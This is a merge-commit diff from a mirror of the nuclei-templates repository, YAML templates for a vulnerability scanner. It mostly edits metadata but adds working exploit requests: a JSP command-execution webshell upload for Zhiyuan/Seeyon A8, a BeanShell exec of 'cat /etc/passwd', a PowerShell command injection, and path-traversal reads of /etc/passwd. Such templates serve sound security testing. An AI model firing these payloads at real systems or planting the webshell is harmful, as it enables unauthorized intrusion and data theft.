daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master'

patch-1
GwanYeong Kim 2022-03-04 10:02:02 +09:00
parent 8848059bee dbdfd6858a
commit 6cc02540e4
144 changed files with 1548 additions and 3360 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3080
.new-additions
View File

File diff suppressed because it is too large Load Diff

3
.nuclei-ignore
View File

@ -13,3 +13,6 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
files:
- cves/2020/CVE-2020-35489.yaml

14
cnvd/2019/CNVD-2019-06255.yaml
View File

@ -3,9 +3,17 @@ id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
severity: critical
description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
reference:
- https://its401.com/article/yun2diao/91344725
- https://github.com/xwlrbh/Catfish/issues/4
tags: rce,cnvd,catfishcms,cnvd2019
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
requests:
- method: GET
@ -25,3 +33,5 @@ requests:
- 'SHELL'
- 'USER'
condition: and
# Enhanced by cs on 2022/02/28

47
cnvd/2019/CNVD-2019-19299.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CNVD-2019-19299
info:
name: Zhiyuan A8 Arbitrary File Writing to Remote Code Execution
author: daffainfo
severity: critical
reference:
- https://www.cxyzjd.com/article/guangying177/110177339
- https://github.com/sectestt/CNVD-2019-19299
tags: zhiyuan,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /seeyon/htmlofficeservlet HTTP/1.1
Host: {{Hostname}}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
- |
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_1, "htmoffice operate")'
- 'contains(body_2, "Windows IP")'
condition: and

23
cnvd/2019/CNVD-2019-32204.yaml Normal file
View File

@ -0,0 +1,23 @@
id: CNVD-2019-32204
info:
name: Fanwei e-cology <= 9.0 Remote Code Execution
author: daffainfo
severity: critical
description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
reference: https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
tags: fanwei,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
matchers:
- type: regex
regex:
- "root:.*:0:0:"

12
cnvd/2021/CNVD-2021-49104.yaml
View File

@ -2,10 +2,18 @@ id: CNVD-2021-49104
info:
name: Pan Micro E-office File Uploads
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
remediation: Pan Wei has released an update to resolve this vulnerability.
author: pikpikcu
severity: critical
reference: https://chowdera.com/2021/12/202112200602130067.html
reference:
- https://chowdera.com/2021/12/202112200602130067.html
- http://v10.e-office.cn
tags: pan,micro,cnvd,cnvd2021
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cwe-id: CWE-434
requests:
- raw:
@ -36,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/28

42
cnvd/2022/CNVD-2022-03672.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal edition RCE
author: daffainfo
severity: critical
reference:
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
tags: cnvd,cnvd2020,sunflower,rce
requests:
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
Host: {{Hostname}}
Cookie: CID={{cid}}
extractors:
- type: regex
name: cid
internal: true
group: 1
regex:
- '"verify_string":"(.*)"'
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
- "contains(body_1, 'verify_string')"
- "contains(body_2, 'Windows IP')"
condition: and

2
cves/2004/CVE-2004-0519.yaml
View File

@ -35,5 +35,3 @@ requests:
- "text/html"
# Enhanced by mp on 2022/01/27
# Enhanced by mp on 2022/01/27

14
default-logins/axis2/axis2-default-login.yaml → cves/2010/CVE-2010-0219.yaml
View File

@ -1,10 +1,16 @@
id: axis2-default-login
id: CVE-2010-0219
info:
name: Axis2 Default Login
name: Apache Axis2 Default Login
author: pikpikcu
severity: high
tags: axis,apache,default-login,axis2
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
tags: cve,cve2010,axis,apache,default-login,axis2
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
classification:
cve-id: CVE-2010-0219
requests:
- raw:
@ -39,3 +45,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/02

5
cves/2010/CVE-2010-1657.yaml
View File

@ -5,10 +5,9 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-1657
- https://www.exploit-db.com/exploits/12428
- https://www.cvedetails.com/cve/CVE-2010-1657
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1657
@ -26,4 +25,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/27

6
cves/2010/CVE-2010-1658.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1658
info:
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12427
- https://www.cvedetails.com/cve/CVE-2010-1658
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1658
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/27

8
cves/2010/CVE-2010-1659.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1659
info:
name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12426
- https://www.cvedetails.com/cve/CVE-2010-1659
- https://nvd.nist.gov/vuln/detail/CVE-2010-1659
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1659
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/28

4
cves/2010/CVE-2010-1714.yaml
View File

@ -4,7 +4,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12168
- https://www.cvedetails.com/cve/CVE-2010-1714
@ -23,4 +22,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/28

6
cves/2010/CVE-2010-1717.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1717
info:
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12291
- https://www.cvedetails.com/cve/CVE-2010-1717
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1717
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

6
cves/2010/CVE-2010-1718.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1718
info:
name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12282
- https://www.cvedetails.com/cve/CVE-2010-1718
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1718
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

6
cves/2010/CVE-2010-1719.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1719
info:
name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12233
- https://www.cvedetails.com/cve/CVE-2010-1719
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1719
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

6
cves/2010/CVE-2010-1722.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1722
info:
name: Joomla! Component Online Market 2.x - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12177
- https://www.cvedetails.com/cve/CVE-2010-1722
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1722
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

6
cves/2010/CVE-2010-1723.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1723
info:
name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12289
- https://www.cvedetails.com/cve/CVE-2010-1723
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1723
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

2
cves/2014/CVE-2014-9094.yaml
View File

@ -31,5 +31,3 @@ requests:
- 200
# Enhanced by mp on 2022/02/25
# Enhanced by mp on 2022/02/25

11
cves/2015/CVE-2015-7297.yaml
View File

@ -1,11 +1,16 @@
id: CVE-2015-7297
info:
name: Joomla Core SQL Injection
author: princechaddha
severity: high
description: SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
reference: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
description: A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-7297
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
tags: cve,cve2015,joomla,sqli
classification:
cve-id: CVE-2015-7297
requests:
- method: GET
@ -17,3 +22,5 @@ requests:
words:
- "cf79ae6addba60ad018347359bd144d2"
part: body
# Enhanced by mp on 2022/03/02

2
cves/2016/CVE-2016-3978.yaml
View File

@ -24,4 +24,4 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

9
cves/2017/CVE-2017-9140.yaml
View File

@ -5,8 +5,11 @@ info:
author: dhiyaneshDk
severity: medium
tags: cve,cve2017,xss,telerik
description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
reference:
- https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
- https://nvd.nist.gov/vuln/detail/CVE-2017-9140
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -29,3 +32,5 @@ requests:
- '#000000"onload="prompt(1)'
- 'Telerik.ReportViewer.axd?name=Resources'
condition: and
# Enhanced by cs on 2022/02/28

30
cves/2018/CVE-2018-16716.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2018-16716
info:
name: NCBI ToolBox - Directory Traversal
author: 0x_Akoko
severity: high
description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
reference:
- https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-16716
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-16716
cwe-id: CWE-22
tags: cve,cve2018,ncbi,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

31
cves/2018/CVE-2018-19365.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-19365
info:
name: Wowza Streaming Engine Manager Directory Traversal
author: 0x_Akoko
severity: high
description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request
reference:
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
- https://www.cvedetails.com/cve/CVE-2018-19365
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19365
cwe-id: CWE-22
tags: cve,cve2018,wowza,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

2
cves/2019/CVE-2019-2767.yaml
View File

@ -22,6 +22,6 @@ requests:
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

12
cves/2020/CVE-2020-13937.yaml
View File

@ -1,16 +1,10 @@
id: CVE-2020-13937
info:
name: Apache Kylin Unauth
name: Apache Kylin Exposed Configuration File
author: pikpikcu
severity: medium
description: |
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
reference:
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
@ -45,3 +39,5 @@ requests:
- kylin.metadata.url
condition: and
part: body
# Enhanced by cs on 2022/02/28

2
cves/2020/CVE-2020-2096.yaml
View File

@ -9,6 +9,8 @@ info:
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

4
cves/2020/CVE-2020-26413.yaml
View File

@ -9,12 +9,14 @@ info:
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275
- https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
- https://nvd.nist.gov/vuln/detail/CVE-2020-26413
tags: cve,cve2020,gitlab,exposure,enum,graphql
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-26413
cwe-id: CWE-200
tags: cve,cve2020,gitlab,exposure,enum,graphql
requests:
- raw:

4
cves/2020/CVE-2020-28976.yaml
View File

@ -8,12 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/49189
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,blind
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-28976
cwe-id: CWE-918
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast
requests:
- method: GET
@ -27,4 +27,4 @@ requests:
- type: word
part: interactsh_protocol
words:
- "http"
- "http"

30
cves/2020/CVE-2020-35234.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-35234
info:
name: SMTP WP Plugin Directory Listing
author: PR3R00T
severity: high
description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.
remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-35234
- https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
tags: cve,cve2020,wordpress,wp-plugin,smtp
classification:
cve-id: CVE-2020-35234
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/"
- "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"
matchers:
- type: word
words:
- "debug"
- "log"
- "Index of"
condition: and
# Enhanced by cs on 2022/02/28

1
cves/2021/CVE-2021-1497.yaml
View File

@ -43,6 +43,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by cs on 2022/02/14
# Enhanced by cs on 2022/02/16

2
cves/2021/CVE-2021-22205.yaml
View File

@ -13,6 +13,8 @@ info:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90

4
cves/2021/CVE-2021-22214.yaml
View File

@ -9,12 +9,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oast
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
cve-id: CVE-2021-22214
cwe-id: CWE-918
tags: cve,cve2021,gitlab,ssrf,oast
requests:
- raw:

4
cves/2021/CVE-2021-39316.yaml
View File

@ -8,12 +8,12 @@ info:
reference:
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
tags: wordpress,cve2021,cve,lfi,wp-plugin
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-39316
cwe-id: CWE-22
tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds
requests:
- method: GET
@ -29,4 +29,4 @@ requests:
- type: status
status:
- 200
- 200

8
cves/2021/CVE-2021-41653.yaml
View File

@ -2,12 +2,14 @@ id: CVE-2021-41653
info:
name: TP-Link - OS Command Injection
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
author: gy741
severity: critical
remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
reference:
- https://k4m1ll0.com/cve-2021-41653.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
- https://www.tp-link.com/us/press/security-advisory/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
@ -43,6 +45,8 @@ requests:
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/02/27

6
cves/2021/CVE-2021-41773.yaml
View File

@ -4,10 +4,12 @@ info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
remediation: Update to Apache HTTP Server 2.4.50 or later.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773
@ -45,3 +47,5 @@ requests:
name: RCE
words:
- "CVE-2021-41773-POC"
# Enhanced by mp on 2022/02/27

4
cves/2021/CVE-2021-41826.yaml
View File

@ -4,7 +4,7 @@ info:
name: PlaceOS 1.2109.1 - Open Redirection
author: geeknik
severity: medium
description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect
description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.
reference:
- https://github.com/PlaceOS/auth/issues/36
- https://www.exploit-db.com/exploits/50359
@ -34,3 +34,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
# Enhanced by mp on 2022/02/27

7
cves/2021/CVE-2021-41878.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2021-41878
info:
name: i-Panel Administration System - Reflected XSS
name: i-Panel Administration System - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41878
- https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878
classification:
@ -35,3 +36,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/02/27

8
cves/2021/CVE-2021-41951.yaml
View File

@ -1,9 +1,9 @@
id: CVE-2021-41951
info:
name: Resourcespace - Reflected XSS
name: Resourcespace - Reflected Cross-Site Scripting
author: coldfish
description: ResourceSpace before 9.6 rev 18290 is affected by a reflected Cross-Site Scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
severity: medium
tags: cve,cve2021,xss,resourcespace
reference:
@ -33,4 +33,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/27

6
cves/2021/CVE-2021-42013.yaml
View File

@ -4,8 +4,10 @@ info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
author: nvn1729,0xd0ff9
severity: critical
